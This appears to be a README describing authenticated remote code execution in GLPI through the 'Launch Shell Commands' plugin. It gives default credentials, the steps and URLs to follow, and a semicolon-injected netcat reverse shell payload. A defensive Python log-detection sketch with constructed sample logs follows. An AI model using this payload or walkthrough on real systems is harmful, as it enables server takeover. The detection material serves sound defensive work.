Edr4/GLPI-RCE-Authenticated

GLPI-RCE-Authenticated

How to RCE as a glpi administrator

Gestionnaire Libre de Parc Informatique (GLPI) is a free asset and IT management software package that provides ITIL service desk features, license tracking and software auditing.

https://github.com/glpi-project/glpi

Requirements

You need to be a super administrator of GLPI to add the plugin and perform the RCE.
The default login is glpi / glpi.

Exploitation

The technique uses a plugin that lets GLPI execute system commands such as ping or tracert, and diverts it to run something else, for example a reverse shell.

First, you must add a "GLPI network" key in the general parameters of GLPI, which gives the right to add extensions. You only have to create a free account on the GLPI site and copy and paste the key.

In the Marketplace: /glpi/front/marketplace.php
Add the plugin named "Launch Shell Commands".

Edit the ping command page: /glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1

Enter a random string in the tag field. In the parameters field, you can run anything as a command by using a semicolon.
You can use this payload for a reverse shell:

;nc -c /bin/bash localhost 1234

The plugin simply passes all the arguments to "exec"; there are no filters.
We control the variable $commandToExec.

Add a ping command group: /glpi/marketplace/shellcommands/front/commandgroup.php

Finally, to execute the payload, go to: /glpi/marketplace/shellcommands/front/advanced_execution.php
Select the ping command group, a category and a device from the list (if you don't have a device, you can create one in Assets).
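
For defenders, the workflow above leaves a recognizable trace in the web server access log: a change to a command definition followed by an advanced execution from the same client. The Python sketch below is an added example, not part of the original repository. It assumes combined-format access logs and that both forms are submitted as POST requests to the plugin paths named above; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines in combined log format (not taken from a real system).
SAMPLE_LOG = """\
198.51.100.20 - - [12/Mar/2024:09:58:11 +0000] "GET /glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1 HTTP/1.1" 200 4312
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /glpi/front/marketplace.php HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2024:10:03:40 +0000] "POST /glpi/marketplace/shellcommands/front/shellcommand.form.php HTTP/1.1" 302 0
this line is truncated and must be skipped
198.51.100.20 - - [12/Mar/2024:10:05:00 +0000] "POST /glpi/marketplace/shellcommands/front/advanced_execution.php HTTP/1.1" 200 2210
203.0.113.7 - - [12/Mar/2024:10:06:15 +0000] "POST /glpi/marketplace/shellcommands/front/advanced_execution.php HTTP/1.1" 200 2210
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

# Assumption: saving a command and running one are POSTs to these plugin paths.
STAGES = {
    "/marketplace/shellcommands/front/shellcommand.form.php": "edit_command",
    "/marketplace/shellcommands/front/advanced_execution.php": "execute",
}

def classify(method, target):
    """Map a request to a workflow stage, ignoring the query string."""
    if method != "POST":
        return None
    path = urlsplit(target).path
    for suffix, stage in STAGES.items():
        if path.endswith(suffix):
            return stage
    return None

def find_edit_then_execute(log_text):
    """Return (client, edit_time, exec_time) for each client that changed a
    command definition and later ran an advanced execution."""
    last_edit, hits = {}, []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # malformed or truncated line
        client, ts, method, target, _status = m.groups()
        stage = classify(method, target)
        if stage == "edit_command":
            last_edit[client] = ts
        elif stage == "execute" and client in last_edit:
            hits.append((client, last_edit.pop(client), ts))
    return hits

if __name__ == "__main__":
    for client, edited, executed in find_edit_then_execute(SAMPLE_LOG):
        print(f"{client}: command edited {edited}, executed {executed}")
```

Client addresses can be shared behind a proxy, so where the log carries a session or user field, correlate on that instead of the IP address.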
